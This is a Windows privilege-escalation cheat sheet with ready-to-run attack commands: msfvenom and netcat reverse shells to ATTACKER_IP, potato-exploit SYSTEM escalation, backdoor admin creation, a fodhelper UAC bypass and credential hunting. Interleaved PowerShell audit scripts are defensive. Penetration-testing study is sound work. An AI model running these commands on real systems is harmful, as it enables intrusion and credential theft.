Windows Privilege Escalation

Local privilege escalation on Windows involves exploiting misconfigurations, vulnerable services, and token manipulation to elevate from standard user to SYSTEM or Administrator.

Warning

Always ensure you have proper authorization before attempting privilege escalation. Document all techniques used and their outcomes.

Initial Enumeration

System Information

Check current user and privileges.

powershell
whoami /all
whoami /priv
whoami /groups

System information.

powershell
systeminfo
hostname
net user %username%
net localgroup administrators

Check installed patches (for kernel exploits).

powershell
wmic qfe get Caption,Description,HotFixID,InstalledOn

Automated Enumeration Tools

WinPEAS

Comprehensive Windows privilege escalation scanner.

powershell
# Download WinPEAS (curl.exe, not the PowerShell alias curl, which maps to Invoke-WebRequest and does not take -L)
curl.exe -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe -o winPEASany.exe

# Run full scan
.\winPEASany.exe

# Run specific checks
.\winPEASany.exe servicesinfo
.\winPEASany.exe applicationsinfo

PowerUp

PowerShell privilege escalation script.

powershell
# Import module
Import-Module .\PowerUp.ps1

# Run all checks
Invoke-AllChecks

# Specific checks
Get-UnquotedService
Get-ModifiableServiceFile
Get-ModifiableService

Seatbelt & SharpUp

GhostPack enumeration tools.

powershell
# Seatbelt - comprehensive system survey
.\Seatbelt.exe -group=all

# SharpUp - quick privesc check
.\SharpUp.exe audit

PrivescCheck

PowerShell alternative to WinPEAS.

powershell
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck -Extended

Service Misconfigurations

Unquoted Service Paths

Find services with unquoted paths containing spaces.

powershell
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

PowerUp detection.

powershell
Get-UnquotedService

Exploitation: If the path is C:\Program Files\Vuln Service\service.exe, Windows tries C:\Program.exe and then C:\Program Files\Vuln.exe before the real binary, so an executable placed at either location runs with the service's privileges. This only works if that directory is writable by the current user and the service is restarted (or starts at boot).

Writable Service Binaries

Check for services with writable executables.

powershell
# Using accesschk (Sysinternals)
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula

# Check specific service
accesschk.exe -ucqv "VulnService" /accepteula

PowerUp - find modifiable service files.

powershell
Get-ModifiableServiceFile

Exploitation: Replace service binary with malicious executable, restart service.

powershell
# Create malicious service binary (msfvenom, on the attacker machine)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe > malicious.exe

# Replace and restart (use sc.exe: in PowerShell, sc alone is an alias for Set-Content)
copy malicious.exe "C:\Path\To\Service.exe"
sc.exe stop VulnService
sc.exe start VulnService

Modifiable Service Configuration

Check if service configuration can be modified.

powershell
Get-ModifiableService

Exploitation: Change service binary path.

powershell
# sc.exe rather than sc (a PowerShell alias for Set-Content); the space after binpath= is required
sc.exe config VulnService binpath= "C:\Windows\Temp\malicious.exe"
sc.exe stop VulnService
sc.exe start VulnService

DLL Hijacking

Find services loading DLLs from writable locations.

text
# Use Process Monitor to find missing DLLs
# Filter: Result = NAME NOT FOUND, Path ends with .dll

# Common hijackable locations
C:\Windows\Temp
C:\Users\Public
Current working directory of service

Create malicious DLL.

bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll > malicious.dll

Token Impersonation (Potato Attacks)

Information

Potato attacks exploit SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege to escalate to SYSTEM. These privileges are common on service accounts (IIS, SQL Server, etc.).

Check for required privileges.

powershell
whoami /priv | findstr -i "SeImpersonate SeAssignPrimaryToken"
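The whoami check above only tells you about the current token. The defender-side question is which accounts on the host hold these two rights at all, so that unexpected grants (for example a web or database service account that no longer needs them) can be reviewed. The following is an added example, not code from the original page or from any of the tools it lists; it assumes an elevated prompt, because secedit reads the local security policy, and it resolves the SIDs that secedit emits to account names.

```powershell
# Added defender-side example (not from the original page): list the holders of
# SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege on this host.
# Requires an elevated PowerShell. Read-only apart from a temp file it deletes.

function Get-ImpersonationRightHolders {
    $cfg = Join-Path $env:TEMP ('secpol-{0}.inf' -f [guid]::NewGuid())
    try {
        # Export only the user-rights area; the file is INI-style with lines such as
        # SeImpersonatePrivilege = *S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-32-544
        $null = secedit.exe /export /cfg $cfg /areas USER_RIGHTS /quiet
        if (-not (Test-Path -LiteralPath $cfg)) { throw 'secedit export failed (run elevated)' }
        $lines = Get-Content -LiteralPath $cfg
        foreach ($right in 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege') {
            $line = $lines | Where-Object { $_ -match "^$right\s*=" } | Select-Object -First 1
            $entries = if ($line) { ($line -split '=', 2)[1].Trim() -split ',' } else { @() }
            foreach ($entry in $entries) {
                $entry = $entry.Trim()
                if (-not $entry) { continue }
                # Entries are SIDs prefixed with '*'; occasionally a plain account name appears.
                $name = $entry
                if ($entry.StartsWith('*')) {
                    try {
                        $sid  = New-Object System.Security.Principal.SecurityIdentifier ($entry.TrimStart('*'))
                        $name = $sid.Translate([System.Security.Principal.NTAccount]).Value
                    } catch {
                        $name = $entry.TrimStart('*') + ' (unresolved SID)'
                    }
                }
                [pscustomobject]@{ Right = $right; Holder = $name; Raw = $entry }
            }
        }
    } finally {
        Remove-Item -LiteralPath $cfg -ErrorAction SilentlyContinue
    }
}

# Baseline Windows grants go to SERVICE, LOCAL SERVICE, NETWORK SERVICE and
# Administrators (plus IIS_IUSRS where IIS is installed); review anything else.
Get-ImpersonationRightHolders | Format-Table -AutoSize
```

Any holder outside the baseline is a candidate for removal via the "Impersonate a client after authentication" and "Replace a process level token" user-rights assignments in local or group policy; service accounts that genuinely need them (IIS application pools, SQL Server) are exactly the ones the potato family targets, so those hosts deserve the extra monitoring rather than a policy change.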

PrintSpoofer (Windows 10/Server 2019+)

powershell
# Get SYSTEM shell
.\PrintSpoofer.exe -i -c cmd

# Execute specific command
.\PrintSpoofer.exe -c "net user hacker Password123! /add"
.\PrintSpoofer.exe -c "net localgroup administrators hacker /add"

GodPotato (Universal - Windows 8+)

powershell
# Execute command as SYSTEM
.\GodPotato.exe -cmd "cmd /c whoami"
.\GodPotato.exe -cmd "cmd /c net user hacker Password123! /add"

# Reverse shell
.\GodPotato.exe -cmd "C:\Windows\Temp\nc.exe ATTACKER_IP 4444 -e cmd"

JuicyPotato (Windows 7/8/Server 2008/2012/2016)

powershell
# Find valid CLSID for target OS
# https://github.com/ohpe/juicy-potato/tree/master/CLSID

# Execute with specific CLSID (quote it: an unquoted {...} is parsed by PowerShell as a script block and the braces are lost)
.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c "{CLSID}"

SweetPotato

powershell
.\SweetPotato.exe -p cmd.exe -a "/c whoami"
.\SweetPotato.exe -p C:\Windows\Temp\nc.exe -a "ATTACKER_IP 4444 -e cmd"

RoguePotato

powershell
# Requires attacker machine listening on port 135
# Attacker: socat tcp-listen:135,reuseaddr,fork tcp:TARGET:9999

.\RoguePotato.exe -r ATTACKER_IP -e "cmd.exe /c whoami" -l 9999

Registry Misconfigurations

AlwaysInstallElevated

Check if MSI files always install with elevated privileges.

powershell
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Exploitation: Create malicious MSI.

bash
# Generate malicious MSI (on the attacker machine)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f msi > malicious.msi

# Install on the target as the low-privileged user (the installer runs as SYSTEM)
msiexec /quiet /qn /i malicious.msi

AutoRun Registry Keys

Check autorun locations for writable entries.

powershell
# Check Run keys
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Check for writable paths in autorun entries
accesschk.exe -wvu "C:\Path\From\Registry"

Scheduled Tasks

List scheduled tasks.

powershell
schtasks /query /fo LIST /v
# /c: keeps the multi-word string literal; without it findstr treats each word as a separate search term
schtasks /query /fo LIST /v | findstr /i /c:"task to run"

Check for writable task executables.

powershell
# Find tasks running as SYSTEM
schtasks /query /fo LIST /v | findstr -i "SYSTEM"

# Check if binary is writable
accesschk.exe -wvu "C:\Path\To\Task\Binary.exe"
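The service, AutoRun and scheduled-task checks above all come down to the same question: is the executable that a privileged context will run, or the folder it lives in, writable by a low-privileged principal? The following is an added audit script, not code from the original page or from PowerUp, WinPEAS or any other tool it names. It covers the unquoted-path condition from the Service Misconfigurations section and the writable-binary condition for services, Run keys and scheduled tasks in one read-only sweep, and prints the remediation command for each finding. It assumes an elevated PowerShell (so every ACL and task definition is readable) and uses only built-in cmdlets.

```powershell
# Added audit example, not part of the original page: one read-only sweep that
# reports (1) unquoted service paths, (2) service binaries, (3) Run-key entries
# and (4) scheduled-task actions whose executable or its folder is writable by a
# low-privileged principal, with the remediation command for each finding.
# Run from an elevated PowerShell so every ACL and task definition is readable.

$LowPrivPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                       'Everyone', 'NT AUTHORITY\INTERACTIVE')
# Rights that allow replacing a file, altering a folder's contents, or rewriting its ACL.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'

function Get-LowPrivWriters {
    # Returns the low-privileged identities holding write-class Allow ACEs on $Path.
    # Deny ACEs are ignored, so the check may over-report but never under-reports.
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return @() }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    $hits = foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $LowPrivPrincipals -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights -band $WriteMask) -ne 0)) {
            $ace.IdentityReference.Value
        }
    }
    return @($hits | Sort-Object -Unique)
}

function Get-ExecutableFromCommandLine {
    # Extracts the executable from a service/autorun/task command line and reports
    # whether it is unquoted while containing spaces (the unquoted-path condition).
    param([string]$CommandLine)
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd -match '^"([^"]+)"') { return @{ Path = $Matches[1]; Unquoted = $false } }
    if ($cmd -match '^(.*?\.exe)(\s|$)') { $path = $Matches[1] } else { $path = ($cmd -split '\s+')[0] }
    return @{ Path = $path; Unquoted = [bool]($path -match '\s') }
}

function Get-WritableBinaryFindings {
    $findings = New-Object System.Collections.Generic.List[object]
    $report = {
        param($Source, $Name, $Issue, $Path, $Principals, $Fix)
        $findings.Add([pscustomobject]@{ Source = $Source; Name = $Name; Issue = $Issue;
            Path = $Path; Principals = ($Principals -join ', '); Fix = $Fix })
    }
    $checkAcl = {
        param($Source, $Name, $ExePath)
        if (-not $ExePath) { return }
        foreach ($target in @($ExePath, (Split-Path -Parent $ExePath -ErrorAction SilentlyContinue))) {
            $who = Get-LowPrivWriters $target
            if ($who.Count -gt 0) {
                & $report $Source $Name 'WritableByLowPriv' $target $who `
                    ('icacls "{0}" /remove:g "{1}"' -f $target, $who[0])
            }
        }
    }
    # 1+2. Services (Win32_Service.PathName is the full command line).
    foreach ($svc in Get-CimInstance Win32_Service | Where-Object { $_.PathName }) {
        $exe = Get-ExecutableFromCommandLine $svc.PathName
        if ($exe.Unquoted) {
            & $report 'Service' $svc.Name 'UnquotedPath' $svc.PathName @() `
                ('sc.exe config {0} binPath= "\"{1}\""' -f $svc.Name, $exe.Path)
        }
        & $checkAcl 'Service' $svc.Name $exe.Path
    }
    # 3. Run keys (machine-wide and current user).
    foreach ($key in 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                     'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run') {
        $item = Get-Item -Path $key -ErrorAction SilentlyContinue
        if (-not $item) { continue }
        foreach ($valueName in $item.GetValueNames()) {
            $exe = Get-ExecutableFromCommandLine ([string]$item.GetValue($valueName))
            & $checkAcl 'AutoRun' "$key\$valueName" $exe.Path
        }
    }
    # 4. Enabled scheduled tasks; the principal is shown so SYSTEM tasks stand out.
    foreach ($task in Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' }) {
        foreach ($action in @($task.Actions | Where-Object { $_.Execute })) {
            $exe   = Get-ExecutableFromCommandLine $action.Execute
            $label = '{0}{1} [{2}]' -f $task.TaskPath, $task.TaskName, $task.Principal.UserId
            & $checkAcl 'ScheduledTask' $label $exe.Path
        }
    }
    return $findings
}

Get-WritableBinaryFindings | Format-Table Source, Name, Issue, Path, Principals, Fix -AutoSize -Wrap
```

Two design choices worth knowing about before trusting the output: Deny ACEs are deliberately ignored, so a folder that grants Users write but denies it again one ACE later will still be listed (false positives are cheap here, misses are not), and ACEs expressed with generic rights bits are matched only through the cast to int, so a very unusual ACL may need a manual look with accesschk. The UnquotedPath and WritableByLowPriv findings correspond to what Get-UnquotedService and Get-ModifiableServiceFile report; the printed sc.exe and icacls commands are the fixes.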

Credential Hunting

Search for passwords in files.

powershell
# Search common files
findstr /si "password" *.txt *.ini *.config *.xml
findstr /si "pwd" *.txt *.ini *.config *.xml

# Search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Check stored credentials
cmdkey /list

Check for saved credentials.

powershell
# Use saved credentials
runas /savecred /user:admin cmd.exe

# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="ProfileName" key=clear

UAC Bypass

Check UAC level.

powershell
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin

UACME - UAC bypass tool collection.

powershell
# List methods
Akagi64.exe

# Execute bypass (method 23 = fodhelper)
Akagi64.exe 23 C:\Windows\Temp\malicious.exe

Fodhelper bypass (manual).

powershell
# Set registry key
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe /c start C:\Windows\Temp\malicious.exe" /f

# Trigger
fodhelper.exe
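From the defender's side, the two registry queries at the top of this section answer "is UAC set so that auto-elevation is possible?", and the manual fodhelper steps show exactly what artifact the bypass leaves behind. The following is an added example, not code from the original page or from UACME; it assumes nothing beyond built-in cmdlets and that the caller can read HKEY_USERS (elevated for other users' hives), and it walks every loaded profile rather than only the caller's HKCU.

```powershell
# Added defender-side example, not part of the original page: summarise the UAC
# settings this section queries and look for the ms-settings registry artifact the
# fodhelper bypass leaves behind, across every loaded user hive. Read-only.

function Get-UacPosture {
    $sys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $sys -ErrorAction SilentlyContinue
    $consentMeaning = @{
        0 = 'Elevate silently (admins never prompted)'
        1 = 'Prompt for credentials on the secure desktop'
        2 = 'Prompt for consent on the secure desktop ("Always notify")'
        3 = 'Prompt for credentials'
        4 = 'Prompt for consent'
        5 = 'Prompt for consent for non-Windows binaries (Windows default)'
    }
    # Assumption: when a value is absent Windows behaves as the documented default (LUA on, level 5).
    $level = if ($null -ne $p.ConsentPromptBehaviorAdmin) { [int]$p.ConsentPromptBehaviorAdmin } else { 5 }
    $lua   = if ($null -ne $p.EnableLUA) { [int]$p.EnableLUA } else { 1 }
    [pscustomobject]@{
        EnableLUA                  = $lua
        ConsentPromptBehaviorAdmin = $level
        Meaning                    = $consentMeaning[$level]
        # Auto-elevating Windows binaries (fodhelper among them) are not auto-elevated
        # at "Always notify", so any lower level leaves that bypass class available.
        AutoElevateBypassExposed   = ($lua -eq 1 -and $level -ne 2)
    }
}

function Find-MsSettingsHijack {
    # The manual bypass writes HKCU\Software\Classes\ms-settings\Shell\Open\command.
    # A clean profile has no ms-settings key under Classes at all, so any hit is suspect.
    $hits = foreach ($hive in Get-ChildItem -Path Registry::HKEY_USERS -ErrorAction SilentlyContinue) {
        # Only real user SIDs; skip .DEFAULT, the *_Classes hives and service SIDs.
        if ($hive.PSChildName -notmatch '^S-1-5-21-\d+-\d+-\d+-\d+$') { continue }
        $key = "Registry::$($hive.Name)\Software\Classes\ms-settings\Shell\Open\command"
        if (Test-Path -LiteralPath $key) {
            $v = Get-ItemProperty -LiteralPath $key
            [pscustomobject]@{
                UserSid         = $hive.PSChildName
                Command         = $v.'(default)'
                DelegateExecute = $v.DelegateExecute
                Remove          = 'reg delete HKU\{0}\Software\Classes\ms-settings /f' -f $hive.PSChildName
            }
        }
    }
    return @($hits)
}

Get-UacPosture | Format-List
Find-MsSettingsHijack | Format-Table -AutoSize
```

Setting the admin prompt level to "Always notify" (ConsentPromptBehaviorAdmin = 2 with the secure desktop) is what closes the auto-elevate class of bypasses, including the UACME methods listed above. For continuous detection rather than a one-off scan, a Sysmon registry value-set rule (Event ID 13) on the Classes\ms-settings\Shell\Open\command path fires at the moment the reg add from the manual steps runs.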

🛠️ Tools Reference

WinPEAS

Comprehensive Windows privesc scanner

GitHub →

PowerUp

PowerShell privesc detection

GitHub →

GodPotato

Universal potato attack

GitHub →

UACME

UAC bypass methods

GitHub →